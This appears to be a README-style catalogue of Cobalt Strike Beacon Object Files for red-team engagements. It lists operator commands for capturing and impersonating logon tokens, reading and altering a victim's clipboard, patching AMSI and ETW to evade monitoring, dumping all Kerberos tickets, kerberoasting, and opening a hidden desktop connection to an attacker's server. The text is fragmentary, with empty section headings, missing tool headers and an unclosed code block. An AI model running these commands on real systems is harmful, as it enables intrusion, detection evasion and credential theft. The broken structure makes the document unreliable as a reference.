CobaltStrike BOF Collections

Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.


Enumeration


Executing .NET Assemblies


Exploitation

Koh client BOF

help koh koh list - lists captured tokens koh groups LUID - lists the group SIDs for a captured token koh filter list - lists the group SIDs used for capture filtering koh filter add SID - adds a group SID for capture filtering koh filter remove SID - removes a group SID from capture filtering koh filter reset - resets the SID group capture filter koh impersonate LUID - impersonates the captured token with the give LUID koh release all - releases all captured tokens koh release LUID - releases the captured token for the specified LUID koh exit - signals the Koh server to exit

koh list --> List current logon sessions koh impersonate --> Impersonate a logon session from above output

ls \dc.theshire.local\C$ --> Use the impersonated privileged logon session to interact with a target system

- [**Cobalt-Clip**](https://github.com/DallasFR/Cobalt-Clip)<br />
A clipboard add-on for Cobalt Strike to interact with the victim's clipboard. With Cobalt-Clip you can dump, edit and monitor the content of a clipboard.<br />
dumpclip --> Dump current contents of clipboard set-clipboard-data --> Modify victims clipboard data clipmon --> Monitor the clipboard for new content and output to console
- [**BOF-patchit**](https://github.com/ScriptIdiot/BOF-patchit/)<br />
A very easy solution to patch AMSI or ETW. Patches AMSI/ETW for the currently running x64 process.
patchit check --> List if AMSI or ETW are currently patched patchit all --> Patch both AMSI and ETW patchit amsi --> Only patch AMSI patchit etw --> Only patch ETW

DO NEFARIOUS STUFF HERE....

patchit revertAll --> Revert both AMSI and ETW patchit revertAmsi --> Revert only AMSI patchit revertEtw --> Revert only ETW

- [**ScreenshotBOF**](https://github.com/CodeXTF2/ScreenshotBOF)<br />
Uses WinAPI and avoids fork&run to take a screenshot.<br />
`screenshot_bof output.bmp 1`

- [**nanorubeus**](https://github.com/wavvs/nanorobeus)<br />
BOF equivalent of Rubeus for managing Kerberos tickets. It can be used cross-platform for multiple C2s including Cobalt Strike, Sliver and Brute Ratel.

<br />
nanorobeus64 luid --> Get logon current ID nanorobeus64 klist --> List all Kerberos tickets nanorobeus64 dump /all --> Dump all Kerberos tickets, requires local admin privileges nanorobeus64 kerberoast /spn:HTTP/server.fortress.local --> Kerberoast a specific SPN
### Miscellaneous
- [**BOF Template**](https://github.com/Cobalt-Strike/bof_template)<br />
Used for creating your very own BOFs!

- [**BOF Hound**](https://github.com/fortalice/bofhound)<br />
An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's ["ldapsearch"](https://github.com/trustedsec/CS-Situational-Awareness-BOF).<br />
Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.<br />
```bofhound -o /data/




Start the HVNC server first
HiddenDesktop <server> <port> --> Start a hidden desktop client connection to your listening server
hd-launch-explorer --> Then start the Windows explorer browser which should pop up a new window on your system